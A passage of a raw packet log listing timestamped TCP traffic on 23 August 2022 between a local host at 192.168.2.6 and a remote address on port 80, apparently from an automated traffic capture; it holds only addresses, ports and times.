                                                                                                                                                                      Aug 23, 2022 18:26:23.328118086 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328133106 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328172922 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328207016 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328211069 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328214884 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328224897 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328250885 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328290939 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328332901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328342915 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328375101 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328380108 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328393936 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328414917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328445911 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328454971 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328483105 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328495026 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328519106 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328533888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328556061 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328574896 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328593016 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328628063 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328634024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328690052 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328732967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328746080 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328773022 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328813076 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328829050 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328851938 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328888893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328908920 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328928947 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328968048 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328982115 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329008102 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329049110 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329065084 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329090118 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329094887 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329130888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329169989 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329179049 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329209089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329246044 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329247952 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329282999 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329288960 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329329967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329329967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329344034 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329370975 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329387903 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329410076 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329451084 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329463959 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329490900 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329529047 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329545021 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329567909 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329574108 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329607964 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329648972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329690933 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329720974 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329729080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329740047 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329770088 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329797983 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329812050 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329840899 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329849958 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329890966 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329895973 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329931974 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329935074 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329957008 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.329972982 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.329981089 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330024958 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330038071 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330056906 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330087900 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330121040 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330133915 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330146074 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330173016 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330203056 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330219030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330231905 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330243111 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330260992 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330262899 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330292940 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330298901 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330322981 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330338955 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330352068 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330362082 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330383062 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330389977 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330410957 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330411911 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330440998 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330441952 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330468893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330478907 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330486059 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330499887 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330530882 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330554962 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330559969 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330575943 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330591917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330621958 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330651045 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330666065 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330679893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330702066 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330725908 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330730915 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330759048 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330790043 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330811977 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330820084 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330840111 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330857038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330878973 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330888987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330909967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330919981 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330933094 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.330949068 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.330977917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331002951 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331006050 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331031084 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331034899 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331063986 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331068039 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331090927 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331096888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331126928 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331130028 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331157923 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331187010 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331218004 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331219912 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331223965 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331228018 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331248045 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331248999 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331275940 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331279993 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331290960 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331309080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331334114 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331337929 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331374884 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331383944 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331397057 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331414938 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331429958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331445932 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331460953 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331475973 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331506014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331530094 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331547976 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331562996 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331592083 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331592083 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331628084 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331655979 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331657887 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331688881 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331690073 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331710100 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331720114 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331742048 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331748009 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331769943 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331777096 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331794977 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331805944 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331835032 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331861973 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331866026 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331893921 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331895113 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331923962 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331928968 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.331948042 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.331969976 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332004070 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332036972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332036018 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332061052 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332070112 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332083941 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332101107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332129955 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332146883 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332156897 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332174063 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332186937 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332201958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332214117 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332237005 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332245111 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332248926 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332273006 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332293034 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332303047 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332315922 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332333088 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332361937 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332381010 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332391977 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332403898 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332421064 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332434893 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332449913 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332467079 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332479000 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332489967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332509995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332535982 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332540035 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332550049 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332571030 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332598925 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332628965 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332658052 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332669020 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332676888 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332681894 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332686901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332703114 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332716942 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332746029 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332758904 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332775116 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332797050 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332804918 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332828045 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332833052 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332851887 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332861900 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332882881 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332890987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332918882 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332923889 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332951069 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332953930 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.332959890 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.332995892 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333007097 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333033085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333056927 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333065033 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333067894 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333093882 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333106041 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333122969 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333149910 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333154917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333172083 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333184004 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333214045 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333223104 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333236933 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333241940 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333256006 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333272934 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333302975 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333311081 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333332062 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333337069 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333360910 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333373070 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333385944 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333389997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333419085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333426952 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333440065 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333448887 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333472967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333477974 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.333507061 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.333508015 CEST804983377.91.103.222192.168.2.6
